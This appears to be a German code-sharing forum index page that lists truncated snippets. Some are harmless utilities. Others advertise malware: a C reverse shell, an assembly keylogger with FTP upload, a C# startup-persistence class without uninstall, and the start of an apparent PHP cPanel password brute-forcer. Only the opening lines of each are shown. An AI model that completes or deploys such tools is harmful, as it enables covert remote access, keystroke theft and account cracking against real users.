Sources
/* MUTHAFUKKEN REVERSE SHELL By a32 Do whatever you want with this code. I dont give a shit. Have fun using/modding this. I had fun coding this ;D */ #include <stdio.h> #include <sy... weiterlesen...
#!/usr/bin/python3 #Simple Password Generator v.01 #By: Alastor import random chars = "abcdefghijklmnopqrstuvwxyz1234567890" password = "" print("\nSimple Password Generator:") print("\nChar... weiterlesen...
public void sendMail(string username, string password, string recipient, string subject, string body) { System.Net.Mail.MailAddress toAddress = new System.Net.Mail.MailAddress(txtTo.Text); S... weiterlesen...
public string Base64Encode(string data) { return Convert.ToBase64String(Encoding.UTF8.GetBytes(data)); } public string Base64Decode(string data) { try { return Encoding.UTF8.GetString(Conver... weiterlesen...
Hier ein Simpler Keylogger mit FTP Upload von DaRkReD aus OpenSc.ws, sehr kleine Filesize. [php] ;Alpha FTP logger ;By DaRkReD ;Released on 3/31/2011 .486 .model flat, stdcall option casemap... weiterlesen...
Hier eine Startup KLasse ohne Deinstall von Xepouhe aus OpenSc.ws [php] static class c_Startup { /"" Coded by Xepouhe :: OpenSC.ws ""/ public static bool IsInstall... weiterlesen...
[php] <?php $cpanel_port="2082"; $connect_timeout=5; set_time_limit(0); $submit=$_REQUEST[’submit‘]; $users=$_REQUEST[‚users‘]; $pass=$_REQUEST[‚pa... weiterlesen...
Kommentare